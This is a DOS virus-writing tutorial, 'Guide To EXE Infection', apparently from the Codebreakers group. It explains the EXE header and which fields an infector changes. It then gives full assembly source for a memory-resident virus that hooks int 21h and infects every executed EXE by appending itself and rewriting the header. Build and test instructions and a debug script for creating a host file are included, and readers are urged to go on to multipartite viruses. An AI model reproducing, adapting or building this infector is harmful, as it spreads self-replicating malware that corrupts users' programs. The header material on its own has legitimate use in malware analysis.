Lesson 4 Guide To EXE Infection By Horny Toad Now onto the 4th lesson, EXE file infection. Boy, the topics never seem to get any easier, do they? The difficult aspect of EXE infection is that there is no ONE technique to cover all forms of EXE infection. I will, therefore, keep to the basics in this tutorial and in later articles, address different techniques which you can use. What is an EXE file? --------------------- One of the first things that we need to do is understand what an EXE file is and more importantly what it looks like. Quite simply, an EXE file is an improvement over the COM file format in that allows the program size to exceed one segment (64k). COM programs are limited to 64K, including 256 bytes for the PSP. EXE files, on the other hand can occupy a much larger space by using more than one segment. The limit on an EXE file's size is the amount of memory/hard drive space you have. There are other characteristics that differ between the EXE and COM formats. In a COM file, the stack is automatically defined, whereas, in an EXE file, you need to initialize it yourself. This is probably the single most difficult concept to grasp when writing EXE files, the stack. Care must be taken that you define the stack large enough to handle all of the push and pop instructions that your program will use. If your stack is to small, your program is sure to crash. The next difference in the two file formats is the initializing of data segment. In a COM file, the data segment is defined as an area within the code segment. Since a COM file only uses one segment anyway, the data, code, and stack segments can all fall right together. Very convienient right? Well, in an EXE file, after the program loader puts the file in memory, both DS and ES contain the address of the PSP! Remember that! Always remember to load the address of the data segment into ds when coding EXE files. At the heart of the EXE file format lies the EXE header. The EXE header is a minimum of 32 bytes that is used to describe a multitude of information about how the program needs to be loaded. Why I say that the header is the heart of the EXE file format, is that a virus which attacks EXE files, needs to utilize practically all of the information in the header. Therefore, pay attention so that you thoroughly understand this concept. Let's take a look at the EXE header format: The length of each element in the EXE header is 2 bytes (1 WORD). The descriptive names of each element in the header are the traditional names that have been used size the EXE file was created. You can give them whatever symbolic name you want to in you virus. EXE Header Format Offset Length Content Description ----------------------------------------------------------------------- 0h 2 4Dh 5Ah EXE file signature "MZ" 2h 2 PartPag Length of last non-full page. 4h 2 PagCnt Length of program in 512 byte pages 6h 2 ReloCnt Number of elements in the relocation table 8h 2 HdrSize Header length in paragraphs 0Ah 2 MinMem Minimum memory left in paragraphs. 0Ch 2 MaxMem Maximum memory left in paragraphs. 0Eh 2 ReloSS Segment correction for stack (SS) 10h 2 ExeSP Value of stack pointer (SP) 12h 2 ChkSum Checksum 14h 2 ExeIP Value of instruction pointer (IP) 16h 2 ReloCS Segment correction for CS 18h 2 TablOff Offset for the first relocation element 1Ah 2 Overlay Overlay number That looks very pretty, but how does it actually look? To tell you the truth, looking at the EXE header in DEBUG makes it look so much more simpler. The only catch is that you need to rename the extension to something other than ".EXE" in order to view the header. You can, if you know the exact program address, use the DEBUG L command to load a certain sector from a disk and then (D)isplay the contents of the sector. Nahh! Too complicated. Just rename the damn thing. Make sure that you have read Horny Toad & Opic's guide to disassembly and understand how to use DEBUG. I have included some sample files in this tutorial to give you some hands-on work with EXE files. One of the samples is a basic do-nothing EXE file. Let's say that I called this file someExe.exe. Below, I will display the contents of the someExe header. At a prompt, type: c:\>debug someExe.eww -d ??:0100 4D 5A 11 00 02 00 01 00-20 00 11 00 FF FF 02 00 MZ...... ....... ??:0110 00 01 00 00 00 00 00 00-3E 00 00 00 01 00 FB 71 ........>......q ??:0120 6A 72 00 00 00 00 00 00-00 00 00 00 00 00 00 00 jr.............. For an easier to read version of the same information, use SPo0ky's EXE header reader for the following results: EXE Signature ........................................ MZ Size of Last Page .................................... 0011 Number of 512 byte pages in file ..................... 0002 Number of Relocation Entries ......................... 0001 Header size in Paragraphs ............................ 0020 Minimum additional Memory required in paragraphs ..... 0011 Maximum additional Memory required in paragraphs ..... FFFF Initial SS relative to start of file ................. 0002 Initial SP ........................................... 0100 Checksum (unused) .................................... 0000 Initial IP ........................................... 0000 Initial CS relative to start of file ................. 0000 Offset within Header of Relocation Table ............. 003E Overlay Number ....................................... 0000 Relocation Table Entries: 0000:0001 However you choose to read the EXE header is fine. At this point, just make sure that you are aware of its existance. I have begun including the debug scripts of the programs that I use in the tutorial so that people who do not have access to the Codebreakers magazine can extract all of the sample programs from the tutorial with the help of debug. The debug usage differs slightly from the other tutorials, so make sure you read the instructions at the end of this file. Now, let's take a look at the individual contants of the EXE header and identify their function in the infection process. EXE signature ------------- The first word in the header is the traditional EXE file signature "MZ". These are the initials of Mark Zbikowski, the programmer who designed the EXE file format. Obviously, you already know from my last tutorial that you can use this unique signature to identify whether or not the file is of the EXE format. PartPag and PagCnt (need to be modified) ------------------ PartPag and PagCnt make up the entire file size including header. PageCnt, as the name implies, is the length of the file expressed in 512 byte pages. PartPag is the amount of bytes that are on the last page of PageCnt. PartPag is expressed as length of the file mod 512. Mod. You better learn this concept now, because it will follow you on into higher programming languages such as C++. 5 % 2 = 1 5 / 2 = 2 The mod (%) is the remainder left over after division has taken place in non-floating point numbers. Simple enough. PartPag and PagCnt will need to be modified to allow for the inclusion of you virus code. ReloCnt ------- The next item in the header represents the number of items in the relocation table. What the hell is a relocation table? A relocation table contains two words (offset,segment) for each element in the program that needs to be adjusted to account for segment location. You can skip over this because you will not have to make any modifications here but... In the relocation table, both words are read and a relative segment address is computed by the sum of the loading segment address (usually PSP seg + 10h) and the segment address to the element that needs adjusting. The loading segment is then added to the element in memory at the relative segment address/offset. HdrSize ------- The next element of the header is the header size. Quite self explanatory, the HdrSize holds the size of the header in 16-byte paragraphs. With the information that you have thus far seen, you can determine the actual bare program size with the equation: Size=((PagCnt*512)-(HdrSize*16))-(512-PartPag) You will also not have to fool with the header size. MinMem & MaxMem --------------- Shall we also have another obvious two contents: MinMem and MaxMem? These two values are used to allocate the amount of memory for the program. ReloSS & ExeSP (need to be modified) -------------- ReloSS and ExeSP are two items that need to be changed to account for the addition of code that you have just appended. ReloSS added with the starting segment address will give you your SS register. Checksum (should be modified) -------- The Checksum item is the traditional place to store an infection marker. ReloCS & ExeIP (need to be modified) -------------- ReloCS is definitely an important item. The item stored here, along with the ExeIP, represents the beginning address to our virus code. This value will be initially saved from the host program so that it can be recalled and control returned back to the host. TablOff -------- This is the offset to the first relocation element in the file. Overlay ------- If this is the program main module, the value should be zero. Below is a simple resident EXE infector. I choose to include a resident virus rather then a direct action infector, because I believe that, if you can write a resident EXE infector, making it non-resident would be a piece of cake. One thing that I was considering to do was to follow the modular style of coding that I used in the last tutorial. One trend that I was seeing in many viruses was that people were simply copying the code. After Slam #4 was released, you have no idea how many EXE infectors started to hit the scene that were essentially a word for word copy. Whatever. In the end, I decided to include the virus below so that you can see everything working in one virus, rather than the modular style of instruction. I am not sure which way is better, so I will probably continue to switch back and forth between styles. Another thing, while I am in the preaching mode, from now on, I will not be explaining the most basic concepts of assembly. If you have been following along with the tutorials, you should understand every concept that is in this tutorial. Really, the only new aspect that you need to be aware of with EXE infection is that you need to change certain values in the header to accomodate your virus. You already know how to do this. In the beginning tutorials, you played around with elements of the DTA. Well, you are going to be doing the same thing with the header, reading it into a buffer and reading and modifying the values that I have pointed out above. .286 virus segment assume cs:virus, ds:virus, es:virus jumps org 0CBh start: call delta ;Calculate delta offset delta: pop bp sub bp,offset delta push ds ;save PSP address push cs cs pop ds es mov ax,0CBCBh ;our "Codebreaker" residency check int 21h ;>what is CB? cmp bx,0C001h ;>C001!! :o) je restore ;its already resident pop ds push ds ;PSP address back into DS ;-------------------------------------------------- mov ax,ds ;MCB residency dec ax ;For further clarification mov ds,ax ;read Codebreaker Tutorial 3 sub word ptr ds:[3],40h sub word ptr ds:[12h],40h xor ax,ax mov ds,ax dec word ptr ds:[413h] mov ax,word ptr ds:[413h] shl ax,6 mov es,ax push cs pop ds lea si,[bp+start] xor di,di mov cx,the_end - start rep movsb ;-------------------------------------------------- xor ax,ax ;Setting of interrupts mov ds,ax ;For further clarification ;read Codebreaker Tutorial 3 mov ax,es mov bx,new_int21h-start cli xchg bx,word ptr ds:[21h*4] xchg ax,word ptr ds:[21h*4+2] mov word ptr es:[old_int21h-start],bx mov word ptr es:[old_int21h+2-start],ax sti ;-------------------------------------------------- push cs cs pop ds es mov ah,9 ;Warns the poor shmuck lea dx,[bp+message] int 21h restore: ;Control handed back lea si,[bp+old_ip] ;Restore orig IP lea di,[bp+original_ip] mov cx,4 rep movsw ; Now for a clarification of the next four lines. At the beginning of ; the virus DS contains the address of the PSP. We now restore the ; address from the stack, place the address in ES. Then add 10h to ; skip over the PSP. Skip over the PSP(100h) with 10h? Sounds a little ; fishy, right? Well, remember that when you add 10h to AX, you are ; adding 10h segments. Each segment is 10h bytes, so 10h*10h=100h (PSP) pop ds mov ax,ds mov es,ax add ax,10h add word ptr cs:[bp+original_cs],ax ;Orig CS cli add ax,word ptr cs:[bp+original_ss] ;Orig SS mov ss,ax mov sp,word ptr cs:[bp+original_sp] ;Orig SP sti db 0eah ;jump to to it original_ip dw ? ; original_cs dw ? original_ss dw ? original_sp dw ? new_int21h: ;our int 21h handler pushf ;push the flags cmp ax,0CBCBh ;residency check jne no_install_check mov bx,0C001h ;already resident popf ;restore all flags iret ;return no_install_check: cmp ah,4bh ;check if execute je infect return: popf ;restore all flags db 0eah ;jmp to orig int 21h old_int21h dd ? infect: pusha ;only 286, saves all gen reg push ds push es call tsr_delta tsr_delta: pop bp ;a tsr delta offset %-) sub bp,offset tsr_delta mov ax,3d02h ;open file in DS:DX int 21h jc exit xchg ax,bx ;file handle to bx push cs cs pop ds es mov ah,3fh ;Read the target header lea dx,[bp+header] ;into our buffer mov cx,1ch int 21h cmp word ptr cs:[bp+header],'ZM' ;check if its an EXE je ok cmp word ptr cs:[bp+header],'MZ' je ok jmp close ok: cmp word ptr cs:[bp+header+12h],'BC' ;Checksum value checked for je close ;previous infection mov word ptr cs:[bp+header+12h],'BC' ;Mark it as infected mov ax,word ptr cs:[bp+header+14h] ;Save orig ExeIP mov word ptr cs:[bp+old_ip],ax ;Store in our buffer mov ax,word ptr cs:[bp+header+16h] ;Save orig ReloCS mov word ptr cs:[bp+old_cs],ax mov ax,word ptr cs:[bp+header+0eh] ;Save orig ReloSS mov word ptr cs:[bp+old_ss],ax mov ax,word ptr cs:[bp+header+10h] ;Save orig ExeSP mov word ptr cs:[bp+old_sp],ax mov ax,4202h ;Set pointer to end of file xor cx,cx xor dx,dx int 21h push ax dx ;Save EOF results ;Calculate new CS:IP, we set ;it to the EOF (this is where ;we will attach our virus) mov cx,16 ;Convert filesize into 16 byte div cx ;paragraphs sub ax,word ptr cs:[bp+header+8] ;Substract Header size from ;filesize to get the image ;(code/data) size. ;save: mov word ptr cs:[bp+header+14h],dx ;New ExeIP mov word ptr cs:[bp+header+16h],ax ;New ReloCS pop dx ax ;restore saved filesize add ax,the_end - start ;Add virus size to file size adc dx,0 ;Adds carry to DX mov cx,512 ;Calculate amount of pages div cx cmp dx,0 je no_remainder inc ax ;if remainder, add 1 no_remainder: mov word ptr cs:[bp+header+4],ax ;New PageCnt mov word ptr cs:[bp+header+2],dx ;New PartPag mov ah,40h ;write the virus to the EOF lea dx,[bp+start] mov cx,the_end - start int 21h mov ax,4200h ;Send pointer to beginning xor cx,cx xor dx,dx int 21h mov ah,40h ;Write the new header lea dx,[bp+header] mov cx,1ch int 21h mov al,7 int 29h ; just a BEEEEEPPP close: mov ah,3eh ;close file int 21h exit: pop es pop ds popa jmp return old_ip dw offset exit_prog old_cs dw 0 old_ss dw 0 old_sp dw 0fffeh header db 1ch dup(?) ;Buffer for header message db 10,13,10,13 db '- SPo0ky''s EXAMPLE TSR EXE infector for Horny Toad''s ''Guide To EXE Infection'' -',10,13 db '- has been installed in your computers memory and will from now on infect any -',10,13 db '- EXE file that you execute. -',10,13 db '- You can use TBCLEAN (www.thunderbyte.com) to clean this virus. -',10,13,10,13 db ' - www.codebreakers.org -',10,13,'$' the_end: exit_prog: mov ax,4c00h ;Request terminate program int 21h virus ends end start In order to see the above virus work. Cut the virus out of this file and save it in a file exevir.asm. At a prompt with TASM/TLINK in the same directory, type: c:\>tasm exevir.asm c:\>tlink exevir.obj Use the myexe.exe (below) as the host program. With both of the programs in the same directory, execute the virus, then execute the host program. If you look at the filesize using the (dir)ectory command, you will see that it has increased in length. Test this virus in a MSDOS box from windows and when you exit out of the MSDOS box, the virus will be gone. If you check the header now, you will be able to see the changes made after infection. Take a look at that beautiful "CB" infection marker. ??:0100 4D 5A 5A 01 03 00 01 00-20 00 11 00 FF FF 02 00 MZZ..... ....... ??:0110 00 01 43 42 01 00 01 00-3E 00 00 00 01 00 FB 71 ..CB....>......q ??:0120 6A 72 00 00 00 00 00 00-00 00 00 00 00 00 00 00 jr.............. To write the definitive guide to all forms of EXE infection, I would need to quit my day job (which I've thought of doing) and just write a book. In the end it is better to have a bunch of installments attacking each issue and facet of virus writing. Look for the future Codebreaker tutorials become much more specific and advanced. If you can understand how to infect COM and EXE files, along with what role encryption and polymorphism can aid in virus effectivness, you are well on you way to making some really awesome creations. The only thing that you need to add from here is some boot infection techniques to the virus and watch out, you'll have a decent multipartide virus. I guess my one piece of advice now is to read code and absorb it. Start to become critical of others code and use that knowledge and judgement to develope your own style. Enough preaching! Have fun! Good luck! Horny Toad SAMPLE PROGRAMS USED IN TUTORIAL -------------------------------- In order to extract this sample program, cut it out of this file and paste it into a file named "myexe.txt". At the prompt, type: c:\>debug < myexe.txt c:\>rename myexe.exd myexe.exe You will then have a sample infectable EXE file. N MYEXE.EXD E 0100 4D 5A 11 00 02 00 01 00 20 00 11 00 FF FF 02 00 E 0110 00 01 00 00 00 00 00 00 3E 00 00 00 01 00 FB 71 E 0120 6A 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0300 B8 01 00 8E D8 8E C0 B4 4C A0 00 00 CD 21 00 00 E 0310 00 RCX 0211 W Q